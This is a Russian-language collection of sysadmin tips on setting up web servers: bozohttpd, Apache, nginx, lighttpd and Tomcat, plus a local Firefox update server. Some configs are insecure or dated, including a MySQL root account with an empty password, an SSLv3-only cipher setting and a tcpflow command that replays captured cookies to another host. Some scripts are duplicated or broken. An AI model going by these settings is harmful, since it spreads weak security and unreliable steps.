bozohttpd. Так вот, у этого сервера нет файлов конфигурации и это здорово! Никаких десятков непонятных инструкций (как, например у Apache), всё прописывается непосредственно при запуске сервера в качестве параметров (флагов). Описание всех этих параметров есть в man-e по httpd данной операционной системы (http://wiki.lissyara.su/wiki/Bozohttpd). Во второй части данной статьи я хотел бы поделиться своим опытом и рассказать о том как использовать встроенный Web-сервер операционных систем NetBSD 5.x в связке типа HTTPD+PHP+MySQL вместо установки более мощного, но и более громоздкого и сложного Apache. После проверки работоспособности сервера можно приступать к установке и настройке дополнительных пакетов. Я приведу пример только для PHP и MySQL, однако другие ставятся и работают аналогично. Установить нужное ПО можно, как минимум, 2-мя способами: компиляцией непосредственно из исходников или же добавлением уже готового пакета с помощью pkg_add. Для краткости я возьму второй способ. Качаем с официального сайта пакеты типа php-5.x.tgz, mysql-php.tgz и mysql-server-5.x.tgz (версии могут быть любыми) и устанавливаем их с помощью pkg_add, например: pkg_add -v php-5.3.6.tgz После окончания установки всех пакетов перезагружаемся! Затем подключаем интерпретатор языка PHP к bozohttpd c помощью флага (или параметра) -С .php /usr/pkg/libexec/cgi-bin/php и устанавливаем новый стартовый файл для сайта - index.php. Выглядит это так: httpd_flags="-С .php /usr/pkg/libexec/cgi-bin/php -x index.php" Теперь создаём тестовый PHP-скрипт (например test1.php) и запрашиваем его через браузер: http://192.168.1.50/test1.php Всё должно заработать! Теперь проверяем работу СУБД MySQL. Запускаем mysql client (который устанавливается вместе с сервером) и даём несколько тестовых команд, например: mysql -uroot -p (вход под root-ом с пустым паролем) show databases; (выводит список баз данных) use mysql; (подключаемся к базе mysql) show tables; (выводит список таблиц этой базы) quit; (выходим из mysql) Если все эти команды были приняты и выполнены интерпретатором, значит MySQL уже работает. Так же можно проверить работу MySQL с помощью скриптов для /bin/sh, например таким: #!/bin/sh echo "select Host, User from user" | mysql -uroot -p mysql; exit 0; Данный скрипт выведет список хостов и пользователей MySQL. Теперь осталось только проверить связку PHP+MySQL и соединить их с Web-сервером. Пишем скрипт на PHP для соединения с СУБД и делаем простой запрос, например так: $dbcn=mysql_connect("localhost", "root", ""); mysql_select_db("mysql"); $r=mysql_query("select Host, User from user"); for($i=0; $i < mysql_num_rows($r); $i++) { $res=mysql_fetch_array($r); echo "$res[Host] $res[User]\n"; } mysql_close($dbcn); Результат выполнения этого скрипта будет аналогичен предыдущему на shell.

Установка Expires без использования mod_expires в Apache (доп. ссылка 1) Автор: sanmai [комментарии]

Если на хостинге не установлен mod_expires, то управляющие кэшированием заголовки можно выдать добавив в .htaccess следующую конструкцию: <FilesMatch "\.(jpg|png|gif|js|css|ico|swf)$"> Header set Expires "Thu, 31 Dec 2037 23:55:55 GMT" Header set Cache-Control "max-age=315360000" </FilesMatch>

Установка PHP 5.2 и PHP 5.3 для одновременной работы под управлением Apache в Windows Автор: Евгений Пономарев [комментарии]

Если у Вас установлен Apache, то сделайте сперва копию папки установленной программы и аналогично для PHP. 1. Сначала удаляем все, что связано с установками Apache и PHP из реестра. (панель управления->установка удаление программ (в XP) панель управления->программы и компоненты (Vista и windows7) удаляем Apache и PHP) 2. Ставим два Apache в разные папки (из копии, не инсталятором .msi). Если нет копии, то пользуемся инсталлятором apache_2.2.14-win32-x86-no_ssl.msi, делаем копию установленной программы и снова ее удаляем. Создаем две папки (например D:\usr\apache22 и D:\usr\apache253) и копируем туда наш апач. Один Apache настраиваем на порт 8080 (главное не 80), второй на 8088. Правим httpd.conf, указав правильные пути для корня серверов, каждый для своей папки и указываем соответствующие порты для прослушивания. 3. Устанавливаем каждый Apache как сервис. из командной строки: httpd -n apache22 -k install - под этот апач поставим PHP 5.2 httpd -n apache253 -k install - под этот апач поставим PHP 5.3 4. Ставим PHP 5.2 в папку php (например D:\usr\php) из архива, а PHP 5.3 в папку php53 (например D:\usr\php53) из архива (обращайте внимание на версии PHP, они есть и x64, выбирайте необходимую Вам). 5. Прописываем в httpd.conf модули подключения PHP LoadModule php5_module "D:/usr/local/php53/php5apache2_2.dll" PHPIniDir "D:/usr/local/php53" AddType application/x-httpd-php .php Запускаем Apache. Можно монитором из папки bin ApacheMonitor.exe или из командной строки: httpd -n apache22 -k start httpd -n apache253 -k start Если Apache при запуске выдал ошибку, не связанную с синтаксисом (неопознанную), копируем php5ts.dll из директории php в папку apache/bin. Если в реестре не осталось упоминаний о PHP, то все заработает. Если не запустилось, проверьте переменные окружения windows на PHPRC. Их не должно быть. В windows 7 все запустилось без проблем. 6. Теперь для удобства, можно поставить nginx, изменив его конфигурацию примерно так: server { listen *:80; server_name site.ru; location / { proxy_pass http://127.0.0.1:8080; proxy_redirect off; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; } } server { listen *:80; server_name site53.ru; location / { proxy_pass http://127.0.0.1:8088; proxy_redirect off; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; } } Теперь просто можно тестировать обе версии PHP. На site.ru - ответит apache c PHP 5.2, а на site53.ru - apache PHP 5.3

Мониторинг работы http-сервера Lighttpd при помощи mod_rrdtool (доп. ссылка 1) [обсудить]

Для оценки нагрузки и отладки работы http-сервера Lighttpd можно использовать входящий в комплект модуль mod_rrdtool. Устанавливаем в системе пакет rrdtool: CentOS / RHEL / Fedora yum install rrdtool Debian / Ubuntu: apt-get update && apt-get install rrdtool FreeBSD: cd /usr/ports/databases/rrdtool && make && make install Активируем в Lighttpd запись статистических данных в RRD-базу. В /etc/lighttpd/lighttpd.conf добавляем (для FreeBSD нужно поправить путь на /usr/local): server.modules += ( "mod_rrdtool" ) ### RRDTOOL Config # path to the rrdtool binary rrdtool.binary = "/usr/bin/rrdtool" # rrd database file rrdtool.db-name = "/home/lighttpd/rrd" Рестартуем http-сервер (service lighttpd reload). Для построения аналитических графиков устанавливаем скрипт lightygraph.cgi: cd /home/lighttpd/cgi-bin/ wget http://redmine.lighttpd.net/attachments/download/793 chmod +x lightygraph.cgi Открываем в браузере страницу http://ваш_домен/cgi-bin/lightygraph.cgi и смотрим графики с информацией о трафике и числе запросов.

Как настроить кеширующий репозиторий для Fedora с помощью nginx Автор: fb769 [комментарии]

Устанавливаем необходимые пакеты yum install nginx yum-utils правим конфиг /etc/nginx/nginx.conf перед последней закрыющейся } дописываем include /etc/nginx/vh/*; создаем каталог mkdir /etc/nginx/vh а в нем файл repocache.local следующего содержания server { listen 80; server_name repocache.local; location /pub/fedora { autoindex on; root /home/repocache; error_page 404 = @fetch_yandex; } location / { autoindex on; root /home/repocache; error_page 404 = @fetch_yandex; } location @fetch_yandex { internal; rewrite ^/pub(.*)$ /$1 break; proxy_pass http://mirror.yandex.ru; proxy_store on; proxy_store_access user:rw group:rw all:r; proxy_temp_path /home/repocache/temp; root /home/repocache/pub; } } создаем каталоги mkdir /home/repocache mkdir /home/repocache/bin mkdir /home/repocache/pub mkdir /home/repocache/temp chown -R nginx:nginx /home/repocache в каталог /home/repocache помещаем скрипт clean.sh #!/bin/bash for f in $@; do echo $f for ff in `repomanage --old $f`; do rm -f $ff done rm -f $f/repodata/* done и repocache.sh #!/bin/bash find /home/repocache/pub -type d -regex .*/updates/.*/i386 -exec /home/repocache/bin/clean.sh {} + find /home/repocache/pub -type d -regex .*/updates/.*/x86_64 -exec /home/repocache/bin/clean.sh {} + rm -f /home/repocache/temp/* #!/bin/bash for f in `repomanage --old $1`; do echo $f rm -f $f done rm -f $1repodata/* и repocache.sh #!/bin/bash path_to_repo_dir="/home/repocache/pub/" /home/repocache/bin/clean.sh ${path_to_repo_dir}fedora/linux/updates/11/i386/ /home/repocache/bin/clean.sh ${path_to_repo_dir}fedora/linux/updates/11/x86_64/ /home/repocache/bin/clean.sh ${path_to_repo_dir}fedora/rpmfusion/free/fedora/updates/11/i386/ /home/repocache/bin/clean.sh ${path_to_repo_dir}fedora/rpmfusion/free/fedora/updates/11/x86_64/ /home/repocache/bin/clean.sh ${path_to_repo_dir}fedora/rpmfusion/nonfree/fedora/updates/11/i386/ /home/repocache/bin/clean.sh ${path_to_repo_dir}fedora/rpmfusion/nonfree/fedora/updates/11/x86_64/ /home/repocache/bin/clean.sh ${path_to_repo_dir}fedora/russianfedora/russianfedora/fixes/fedora/updates/11/i386/ /home/repocache/bin/clean.sh ${path_to_repo_dir}fedora/russianfedora/russianfedora/fixes/fedora/updates/11/x86_64/ /home/repocache/bin/clean.sh ${path_to_repo_dir}fedora/russianfedora/russianfedora/free/fedora/updates/11/i386/ /home/repocache/bin/clean.sh ${path_to_repo_dir}fedora/russianfedora/russianfedora/free/fedora/updates/11/x86_64/ /home/repocache/bin/clean.sh ${path_to_repo_dir}fedora/russianfedora/russianfedora/nonfree/fedora/updates/11/i386/ /home/repocache/bin/clean.sh ${path_to_repo_dir}fedora/russianfedora/russianfedora/nonfree/fedora/updates/11/x86_64/ rm -f /home/repocache/temp/* Запускаем nginx service nginx start Добавляем в crontab запуск скрипта /home/repocache/bin/repocache.sh раз в сутки (ночью) Перенастраиваем локальные компы и на новый репозиторий и пробуем обновиться Удачи.

Конфигурация Nginx + PHP + FastCGI для Magento (доп. ссылка 1) Автор: alexweb [комментарии]

Не так давно пришлось оптимизировать сервер у заказчика. Нужно было заменить Apache на Nginx. На официальном форуме можно найти примеры конфигурации, например http://www.magentocommerce.com/boards/viewthread/7931/ , однако использование rewrite для таких случаев всячески порицается разработчиком сервера. Замечания * Процесс сборки nginx и php описан на офсайтах * Предполагается, что php с поддержкой fast-cgi настроен и работает на 127.0.0.1:8888, а nginx на 127.0.0.1:80 * Папка, в которой лежат файлы Magento: /home/alex/www/server.com/ * Так как Nginx работает с php напрямую, а не через связку с Apache, следует обратить особое внимание на директивы для php, которые идут в .htaccess из стандартной поставки magento. Nginx не обрабатывает директивы из .htaccess и поэтому их нужно перенести в php.ini. У меня, например, перестала работать загрузка картинок к товарам, пока не добавил suhosin.session.cryptua off в php.ini. * Предполагается, что в Magento настроены ЧПУ Ниже привожу свою конфигурацию. Дополнения и комментарии всячески приветствуются. server { listen 127.0.0.1:80; server_name server.com; #Включаем сжатие gzip on; #gzip_comp_level 9; gzip_min_length 1000; gzip_proxied any; gzip_types text/plain application/xml text/html text/css text/js application/x-javascript; # Важно!!!! Ниже должна быть указана папка в которой лежит код Magento root /home/alex/www/server.com/; location / { index index.php; error_page 404 = @magento; } # Фикс для js location /js/ { index index.php; error_page 404 = @magento_js; } # Фикс для случая, когда используется расширение FOOMAN_Speedster. location ^~ /minify/ { rewrite ^/minify/([^/]+)(/.*.(js|css))$ /lib/minify/m.php?f=$2&d=$1 last; break; } location @magento { # Если fastcgi_params лежит по другому пути то заменить на свой include /etc/nginx/fastcgi_params; #Важно !!!! fastcgi_pass 127.0.0.1:8888; fastcgi_param SCRIPT_FILENAME $document_root/index.php; #Важно !!! } location @magento_js { include /etc/nginx/fastcgi_params; fastcgi_pass 127.0.0.1:8888; fastcgi_param SCRIPT_FILENAME $document_root/js/index.php; } location ~ .php$ { index index.php; include /etc/nginx/fastcgi_params; fastcgi_pass 127.0.0.12:8888; fastcgi_index index.php; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; } location ~* \.(jpg|gif|png|css|js|jpeg|ico)$ { if (-f $request_filename) { access_log off; expires 7d; } } После такой настройки плагин YSlow дает сайту уровень B по скорости. Если очень постараться и вынести всю статику на отдельный поддомен, то можно еще ускориться.

Создание локального сервера обновлений для Firefox (доп. ссылка 1) (доп. ссылка 2) Автор: Unghost [комментарии]

Инструкция, как поднять локальный сервер обновлений для Firefox. В наличии имелся сервер с Debian Lenny. На него был поставлен apache2 и libapache2-mod-php5 sudo apt-get install apache2 sudo apt-get install libapache2-mod-php5 В файле /etc/apache2/sites-available/default директива AllowOverride None была изменена на AllowOverride FileInfo В каталоге /var/www был создан каталог /var/www/update/Firefox/3.0.10/win32/ru/release и туда положены файлы: root@db-fw:/var/www/update/Firefox/3.0.10/win32/ru/release# ls -la -rw-r--r-- 1 root root 2188005 2009-05-28 11:22 firefox-3.0.10-3.0.11.ru.win32.partial.mar -rw-r--r-- 1 root root 10189913 2009-05-28 11:25 firefox-3.0.11.ru.win32.complete.mar -rw-r--r-- 1 root root 59 2009-05-28 10:12 .htaccess -rw-r--r-- 1 root root 658 2009-05-28 11:20 update -rw-r--r-- 1 root root 650 2009-05-28 12:12 update.xml Файлы firefox-3.0.10-3.0.11.ru.win32.partial.mar и firefox-3.0.11.ru.win32.complete.mar были взяты с ftp://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/3.0.11-candidates/build1/ Файлы .htaccess и update были взяты с https://developer.mozilla.org/en/Setting_up_an_update_server без изменений. .htaccess: <FILES update> ForceType application/x-httpd-php </FILES> PHP скрипт update: <?php header("Content-type: text/xml"); $url_array=explode("/",$_SERVER["REQUEST_URI"]); $noidea=$url_array[2]; $product=$url_array[3]; $version=$url_array[4]; $build_id=$url_array[5]; $build_target=$url_array[6]; $locale=$url_array[7]; $channel=$url_array[8]; // filename is totally ignored $filename=$url_array[9]; $updatefile = "update.dir/$noidea/$product/$version/$build_id/$build_target/$locale/$channel/$filename"; if (file_exists($updatefile)) { $handle = fopen($updatefile, "r"); $contents = fread($handle, filesize($updatefile)); echo "$contents"; fclose($handle); } else { echo '<?xml version="1.0"?>'; ?> <updates></updates> <? } ?> Потом был создан файл update.xml: <?xml version="1.0"?> <updates> <update type="minor" version="3.0.11" extensionVersion="3.0.11" buildID="2009042316" detailsURL="http://192.168.0.1/ru/firefox/3.0.11/releasenotes/"> <patch type="complete" URL="http://192.168.0.1/update/Firefox/3.0.10/win32/ru/release/firefox-3.0.11.ru.win32.complete.mar" hashFunction="SHA1" hashValue="1a08be9c203da5fb20f632e970e23331bb21b995" size="10189913" /> <patch type="partial" URL="http://192.168.0.1/update/Firefox/3.0.10/win32/ru/release/firefox-3.0.10-3.0.11.ru.win32.partial.mar" hashFunction="SHA1" hashValue="67683707609194c20188459da2ecfe9853122de4" size="2188005" /> </update> </updates> Хэш функции были вычислены с помощью sha1sum. Потом я открыл русский Firefox 3.0.10 для Windows и создал строковый параметр app.update.url.override со значением http://192.168.0.1/update/Firefox/3.0.10/win32/ru/release/update.xml и проверил наличие обновлений. Firefox успешно нашёл обновление для 3.0.11 и успешно его применил.

Добавление SSL шифрования для не SSL сайта силами nginx (доп. ссылка 1) [комментарии]

Ниже представлен пример настройки SSL-акселератора, выполненного средствами http-сервера nginx. Предположим, что нужно проксировать сайт testhost.ru, размещенный на сервере 192.168.1.1. Следующий блок конфигурации определяет работу SSL-акселератора: server { listen 192.168.1.1:443; server_name testhost.ru; access_log logs/ssl.log main; ssl on; ssl_certificate /certs/ssl.crt; ssl_certificate_key /keys/ssl.key; location / { proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $p roxy_add_x_forwarded_for; proxy_set_header Host $http_host; proxy_set_header X-FORWARDED_PROTO https; proxy_redirect false; proxy_pass http://main_site; } } В http секции конфигурации определяем сервер который будем проксировать: upstream main_site { server 192.168.1.1:8080; } При желании можно ограничить разрешенный тип шифрования: ssl_ciphers HIGH:!ADH; ssl_perfer_server_ciphers on; ssl_protocols SSLv3; Также можно включить gzip сжатие проксируемого трафика, для этого в http секции добавляем: gzip on; gzip_min_length 1100; gzip_buffers 4 8k; gzip_types text/plain text/html text/css text/js;

Настройка SSL, авторизации и редиректа в Apache Tomcat Автор: Андрей [комментарии]

Несколько советов пользователям Apache Tomcat: Поддержка SSL ------------- В server.xml раскомментируем listener и добавим опции: <Listener className="org.apache.catalina.core.AprLifecycleListener" SSLEngine="on" /> <Connector port="8443" protocol="HTTP/1.1" SSLEnabled="true" maxThreads="150" scheme="https" secure="true" SSLCACertificateFile="${catalina.home}/cert/root.crt" SSLCertificateFile="${catalina.home}/cert/client.pem" SSLCertificateKeyFile="${catalina.home}/cert/client.pem" sslProtocol="TLS" /> Если сертификат самоподписанный, то SSLCACertificateFile можно пропустить. Доступ на сервис https://tomcat:8443 Редирект -------- Для апача создать tomcat.conf в /etc/httpd/conf.d <VirtualHost *:80> DocumentRoot /var/www/html ServerName service.dc-local ServerAlias service Redirect permanent / https://tomcat:8443/service </VirtualHost> Авторизация на страницу ----------------------- В web.xml приложения добавить:  <security-constraint> <web-resource-collection> <web-resource-name>Protected Area</web-resource-name>  <url-pattern>/*</url-pattern>  </web-resource-collection> <auth-constraint> <role-name>role1</role-name> <role-name>role2</role-name> </auth-constraint> </security-constraint>  <login-config> <auth-method>BASIC</auth-method> <realm-name>BLA BLA BLA</realm-name> </login-config>  <security-role> <description>BLA BLA BLA</description> <role-name>role1</role-name> <role-name>role2</role-name> </security-role> роли должны быть в tomcat-users.xml, либо см. ниже. Поддержка авторизации по группам из LDAP ---------------------------------------- В server.xml добавить: <Realm className="org.apache.catalina.realm.JNDIRealm" connectionURL="ldap://ldap:389" allRolesMode="authOnly" userBase="ou=users,dc=domain,dc=local" userSearch="uid={0}" roleBase="ou=group,dc=domain,dc=local" roleName="cn" roleSearch="memberUid={1}"/> группы будут определены как роли для авторизации.

Дублирование HTTP запросов для тестирования сервера (доп. ссылка 1) Автор: asd [комментарии]

Иногда требуется симулировать нагрузку на тестовый web-сервер на основе запросов поступающих к основному серверу, т.е. произвести параллельную отправку запросов на другой сервер или просто повторить какой-то набор запросов на основе данных из лог-файла за определенный период времени. Для сбора информации будем использовать утилиту tcpflow (http://www.circlemud.org/~jelson/software/tcpflow/), которая имеется в портах FreeBSD (net/tcpflow) и в составе большинства Linux дистрибутивов. Дублирование POST запросов: sudo tcpflow -cp -i eth0 dst port 80 | grep param | while read line; \ do curl -s -- "http://duplicate.host/ask?"$line; done Дублирование GET запросов с Cookie: sudo tcpflow -cpi eth1 dst port 80 | while read line; do if I=`echo $line | grep "GET /url/"`; then REQ=`echo $line | cut -b 50- | sed s@HTTP/1.1@@`; fi; if J=`echo $line | grep "Cookie: "`; then COOKIE=$line; curl -s -H "$COOKIE" -- http://server:port$REQ; fi; done

Обеспечение работы системы мониторинга Nagios при помощи Nginx (доп. ссылка 1) Автор: comatoz [комментарии]

Web-сервер apache наверное самый лучший web-сервер, но при настройке web-интерфейса для nagios можно обойтись и без него, что сейчас и будет описано. Применительно к FreeBSD: portinstall /usr/ports/www/nginx В /etc/rc.conf.local # nginx nginx_enable=YES nginx не может выполнять php и cgi скрипты. Для этого можно использовать backend серверы. Схема получается следующая: mini_httpd ---*.cgi---> 192.168.0.200:1081 / nginx / lighttpd 192.168.0.200:80------*.php---> 192.168.0.200:1082 \ \ Каталог ---*.html--> /usr/local/www/... В этой схеме nginx слущает на порту запросы, производит авторизацию, статические файлы отдает сам, cgi-скрипты перенаправляет к запущенному на внутреннем порту 127.0.0.1:1081 mini_httpd (/usr/ports/www/mini_httpd), который в свою очередь и выполняет эти скрипты. Схема может показатся сложной, но в моём случае переход на нее оправдался: опрос nagios производится 1 раз в минуту из Firefox (спец.плагин), и машина с nagios испытывала некоторые трудности с производительностью. После запуска данной схемы нагрузка на машину значительно снизилась. Если используется pnp4nagios (http://www.pnp4nagios.org/pnp/install) для построения графиков производительности сервисов, то выполнение php-скриптов возможно с помощью запущенного на внутреннем порту 127.0.0.1:1082 lighttpd (/usr/ports/www/lighttpd). Конфигурационные файлы nginx хранятся по умолчанию в /usr/local/etc/nginx/. /usr/local/etc/nginx/nginx.conf user www www; worker_processes 1; error_log /var/log/nginx/error.log; pid /var/run//nginx.pid; worker_rlimit_nofile 8192; events { worker_connections 4096; } http { include mime.types; include proxy.conf; default_type application/octet-stream; log_format main '$remote_addr - $remote_user [$time_local] $status ' '"$request" $body_bytes_sent "$http_referer" ' '"$http_user_agent" "$http_x_forwarded_for"'; access_log /var/log/nginx/access.log main; sendfile on; tcp_nopush on; server_names_hash_bucket_size 128; # this seems to be required for some vhosts ## интранет server { listen 192.168.0.200:80; server_name 192.168.0.200 ns.contora.local; access_log /var/log/nginx/access.log; include nagios.conf; include nagios-pnp.conf; location / { root /usr/local/www/apache22/data/; } include error-pages.conf; } } /usr/local/etc/nginx/nagios.conf location /nagios/ { auth_basic "Nagios "; auth_basic_user_file /usr/local/www/nagios/.htpasswd; alias /usr/local/www/nagios/; } location /nagios/cgi-bin/ { auth_basic "Nagios "; auth_basic_user_file /usr/local/www/nagios/.htpasswd; proxy_pass http://localhost:1081; proxy_redirect http://localhost:1081/nagios/cgi-bin/ /nagios/cgi-bin/; set $referer $http_referer; proxy_set_header Referer $referer; proxy_set_header X-Real-IP $remote_addr; proxy_set_header Host localhost:1081; proxy_set_header REQUEST_METHOD $request_method; proxy_set_header REMOTE_USER $remote_user; proxy_set_header REMOTE_ADDR $remote_addr; proxy_set_header SERVER_NAME localhost; proxy_set_header SERVER_PORT 1081; proxy_set_header HTTP_COOKIE $http_cookie; } /usr/local/etc/nginx/nagios-pnp.conf location ~* /pnp/.*\.php$ { root /usr/local/share/; fastcgi_pass 127.0.0.1:1082; fastcgi_index index.php; fastcgi_param SCRIPT_FILENAME /usr/local/nagios/share/$fastcgi_script_name; include fastcgi_params; } location ~* /pnp/ { root /usr/local/nagios/share/; index index.php index.html index.htm; } /usr/local/etc/nginx/error-pages.conf error_page 500 502 503 504 /50x.html; location = /50x.html { root /usr/local/www/nginx-dist; } error_page 401 /401.html; location = /401.html { root /usr/local/www/nginx-dist; } error_page 404 /404.html; location = /404.html { root /usr/local/www/nginx-dist; } Ссылки: http://sysoev.ru/nginx/ http://www.lighttpd.net/ http://www.acme.com/software/mini_httpd/ http://www.lissyara.su/?id=1532

Как в nginx на лету изменить отдаваемый html Автор: nginx-ru maillist [обсудить]

Модуль ngx_http_sub_module изменяет в ответе одну заданную строку на другую. http://sysoev.ru/nginx/docs/http/ngx_http_sub_module.html location / { sub_filter </head> '</head><script language="javascript" src="$script"></script>'; sub_filter_once on; } Модуль ngx_http_addition_module добавляет текст до и после ответа. http://sysoev.ru/nginx/docs/http/ngx_http_addition_module.html

Отключаем избирательно в Apache чувствительность к регистру в URL Автор: Андрей [комментарии]

Проверить загрузку модуля в файле конфигурации httpd.conf: LoadModule speling_module modules/mod_speling.so в свойствах домена включаем опцию: <Directory ..> CheckSpelling on проверено на RedHat EL5, httpd-2.2.3

Запуск Apache с разной конфигурацией в Gentoo Linux (доп. ссылка 1) Автор: Eugeny Fomin [обсудить]

Суть проблемы заключалось в том, что надо было запустить несколько вебсерверов с разной конфигурацией, например с разными модулями и на разных ip адресах. Для этого не нужно компилировать и устанавливать несколько апачей, а достаточно запускать один и тот же установленный в системе, со своим конфигурационным файлом. Решение Допустим нужно запустить два апача на разных ip, назовем их apache_v1 и apache_v2. apache_v1 будет висеть на ip 192.168.0.1, apache_v2 на 192.168.0.2 Будем считать, что установлен Apache2. # cp /etc/conf.d/apache2 /etc/conf.d/apache2_apache_v1 # cp /etc/conf.d/apache2 /etc/conf.d/apache2_apache_v2 # vi /etc/conf.d/apache2_apache_v1 Добавляем строку: CONFIGFILE=/etc/apache2/httpd_apache_v1.conf # vi /etc/conf.d/apache2_apache_v2 Добавляем строку: CONFIGFILE=/etc/apache2/httpd_apache_v2.conf # cp /etc/apache2/httpd.conf /etc/apache2/httpd_apache_v1.conf # cp /etc/apache2/httpd.conf /etc/apache2/httpd_apache_v2.conf Правим *.conf фалы по вашему усмотрению. # vi /etc/apache2/httpd_apache_v1.conf Заменяем директивы на следующие: Listen 192.168.0.1:80 PidFile "/var/run/apache2_apache_v1.pid" Аналогично и для apache_v2 # vi /etc/apache2/httpd_apache_v2.conf Listen 192.168.0.2:80 PidFile "/var/run/apache2_apache_v2.pid" # cp /etc/init.d/apache2 /etc/init.d/apache2_apache_v1 # cp /etc/init.d/apache2 /etc/init.d/apache2_apache_v2 Добавляем их в автозагрузку: # rc-update -a apache2_apache_v1 default # rc-update -a apache2_apache_v2 default Запускаем: # /etc/init.d/apache2_apache_v1 start # /etc/init.d/apache2_apache_v2 start Материал предоставлен http://www.inode.ru/

Скрипт для автосборки Apache, mod_ssl, php5 и mysql Автор: April [комментарии]

Простенький скриптик для автосборки Apache 1.3.x + openssl+mod_ssl + php5+mysql был написан из-за беспробудной лени автора Для работы требуются (минимум): - FreeBSD 4.8 (проверено) и наверное выше - FreeBSD 5.1,5.2.1 (проверено) и наверное выше - установленные пакеты libxml2-2.6.2_1.tbz mm-1.3.0.tbz python-2.3.2_3.tbz unzip-5.50_2.tbz zip-2.3_1.tbz и связанные с ними пакеты, возможно для удобства еще надо мс Кроме того необходимо чтобы версия Apache совпадала с версией mod_ssl #!/bin/sh # #Apache 1.x.y compile!!! # # #################################### # -=April (c)=- ###-=2005=-# #################################### SRC=`pwd` DST=/usr/local/server ln -s $DST /server HTTPD_SRC=$SRC/apache HTTPD_DST=$DST/apache PHP_SRC=$SRC/php PHP_DST=$DST/php MYSQL_DST=$DST/mysql MYSQL_SRC=$SRC/mysql OPENSSL_SRC=$SRC/openssl OPENSSL_DST=$DST/openssl MODSSL_SRC=$SRC/mod_ssl MODSSL_DST=$DST/mod_ssl #prepare configuring APACHE cd $HTTPD_SRC ./configure --prefix=$HTTPD_DST prepare configuring MySQL cd $MYSQL_SRC ./configure --prefix=$MYSQL_DST make make install cd $PHP_SRC ./configure --prefix=$PHP_DST --with-apache=$HTTPD_SRC --with-mysql=$MYSQL_DST \ --enable-force-cgi-redirect --enable-sockets --with-mod_charset --with-xml make make install cd $OPENSSL_SRC ./Configure make make test make certificate make install cp $PHP_SRC/.libs/libphp5.a $HTTPD_SRC/src/modules/php5 cd $MODSSL_SRC ./configure --prefix=$HTTPD_DST --with-apache=$HTTPD_SRC --with-ssl=$OPENSSL_SRC \ --activate-module=src/modules/php5/libphp5.a --enable-module=ssl --server-uid=www --server-gid=www cd $HTTPD_SRC #./configure --prefix=$HTTPD_DST --activate-module=src/modules/php4/libphp4.a --enable-module=ssl \ #--server-uid=www --server-gid=www ./configure --prefix=$HTTPD_DST --enable-module=rewrite --enable-shared=rewrite \ --activate-module=src/modules/php5/libphp5.a --server-uid=www --server-gid=www make make certificate TYPE=custom make install

Почему в apache может передаваться битая информация [обсудить]

Если используется русский apache и после закачки через форму файл приходит битый: CharsetRecodeMultipartForms Off Если пользователь скачивает битый файл (например, rar-архив): - Убедитесь, что для типа вашего файла присутствует корректная запись вmime.types; - Проверьте, какой тип по умолчанию установлен в httpd.conf, лучше поставить DefaultType application/octet-stream Если PHP скрипт выдает битую информацию: См. заметку "В чем может быть причина битых бинарных файлов на выходе PHP" https://www.opennet.ru/tips/info/740.shtml

Особенности установки Tomcat 5.0 под FreeBSD 5.2 Автор: Александр Елисеенко [комментарии]

Итак, при построении jdk 1.4.2 из портов необходимо иметь разрешение эмуляции Linux в ядре и монтированную файловую систему linprocfs. Для этого в файле /etc/rc.conf необходимо указать # linux_enable="YES" а в файле /etc/fstab # linprocfs /compat/linux/proc linprocfs rw 0 0 По завершении установки необходимо установить переменную окружения JAVA_HOME, которая указывает на каталог с установленным jdk Соответственно, в файле .cshrc необходимо добавить # setenv JAVA_HOME /usr/local/jdk1.4.2 а в файле .profile # export JAVA_HOME=/usr/local/jdk1.4.2 Установка Tomcat 5.0 из портов проблем не вызвала, но запуск программы постоянно срывался. Изучение логов показало, что Tomcat пытался работать с протоколом IPv6, который не был установлен в моей системе. В соответствии с рекомендацией, данной в логах, делаем запрет на IPv6 # sysctl net.inet6.ip6.v6only=0 теперь все работает. Как вариант, можно внести соответствующие изменения в catalina.sh и сделать запуск java с ключем -Djava.net.preferIPv4Stack=true, но через sysctl мне показалось проще.

Генерация сертификатов для mod_ssl (доп. ссылка 1) Автор: Александр Елисеенко [комментарии]

В состав дистрибутива openssl входят скрипты CA.sh и CA.pl (/usr/local/openssl/misc) создаем корневой сертификат ./CA.sh -newca генерируем личный ключ и сертификационный запрос сервера ./CA.sh -newreq и подписываем его своим корневым сертификатом. ./CA.sh -sign переписываем ключ и сертификат сервера в служебный каталог Apache cp newreq.pem /usr/local/etc/apache/sslkey/server.key cp newcert.pem /usr/local/etc/apache/ssl.crt/server.crt Файл корневого сертификата ./demoCA/cacert.pem необходимо распространить по клиентским компьютерам.

Почему при использовании mod_bandwidth перестает работать метод POST Автор: Roman Skopenko [обсудить]

mod_bandwidth должен быть размещен вначале списка AddModule/LoadModule, т.е. до остальных модулей. Если mod_bandwidth врезается в httpd, то при сборке нужно: ./configure --add-module=mod_bandwidth.c --permute-module=BEGIN:bandwidth

Как запретить русскому apache перекодировать страницы по Accept-Charset [обсудить]

По умолчанию русский apache всегда выдает "Vary: accept-charset" и в случае получения от пользователя заголовка Accept-Charset перекодирует в указанную в нем кодировку. Решается проблема добавлением директивы: CharsetDisableAcceptCharset On

Почему при скачивании по HTTP бинарного файла он скачивается битым. [комментарии]

Для файлов неизвестного типа (например, .rar) используется MIME тип определеный через DefaultType, как правило это text/plain, который может быть перекодирован russian-apache. Существует два решения проблемы: 1. DefaultType application/octet-stream в httpd.conf 2. Явно определить MIME тип вашего файла в mime.types

Редирект незакрытых директорий на имя текущего алиаса виртуального хоста, а не на основной домен. Автор: uldus [обсудить]

> Как сделать чтобы автоматом перебрасывало http://host1.test.ru/dir на > http://host1.test.ru/dir/, а не на http://www.test.ru/dir/ UseCanonicalName Off

Почему suexec может не работать при запуске Apache в режиме chroot. (доп. ссылка 1) [обсудить]

